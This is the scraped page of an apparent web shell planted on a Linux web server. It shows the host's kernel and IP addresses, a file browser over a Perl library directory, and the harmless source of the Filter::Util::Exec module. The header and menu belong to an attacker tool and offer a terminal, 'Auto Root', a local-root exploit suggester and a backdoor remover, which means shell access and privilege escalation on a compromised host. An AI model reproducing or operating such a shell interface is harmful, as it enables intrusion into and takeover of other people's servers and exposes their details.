Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.140.254.100
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib64 /
perl5 /
vendor_perl /
Filter /
Util /
Delete
Unzip
Name
Size
Permission
Date
Action
Call.pm
12.61
KB
-rw-r--r--
2013-04-02 23:33
Exec.pm
1.2
KB
-rw-r--r--
2013-04-02 23:35
filter-util.pl
988
B
-rw-r--r--
2013-03-29 13:56
perlfilter.pod
20.56
KB
-rw-r--r--
2012-06-19 15:16
Save
Rename
package Filter::Util::Exec ; require 5.002 ; require DynaLoader; use strict; use warnings; use vars qw(@ISA $VERSION) ; @ISA = qw(DynaLoader); $VERSION = "1.49" ; bootstrap Filter::Util::Exec ; 1 ; __END__ =head1 NAME Filter::Util::Exec - exec source filter =head1 SYNOPSIS use Filter::Util::Exec; =head1 DESCRIPTION This module is provides the interface to allow the creation of I<Source Filters> which use a Unix coprocess. See L<Filter::exec>, L<Filter::cpp> and L<Filter::sh> for examples of the use of this module. =head2 B<filter_add()> The function, C<filter_add> installs a filter. It takes one parameter which should be a reference. The kind of reference used will dictate which of the two filter types will be used. If a CODE reference is used then a I<closure filter> will be assumed. If a CODE reference is not used, a I<method filter> will be assumed. In a I<method filter>, the reference can be used to store context information. The reference will be I<blessed> into the package by C<filter_add>. See L<Filter::Util::Call> for examples of using context information using both I<method filters> and I<closure filters>. =head1 AUTHOR Paul Marquess =head1 DATE 11th December 1995. =cut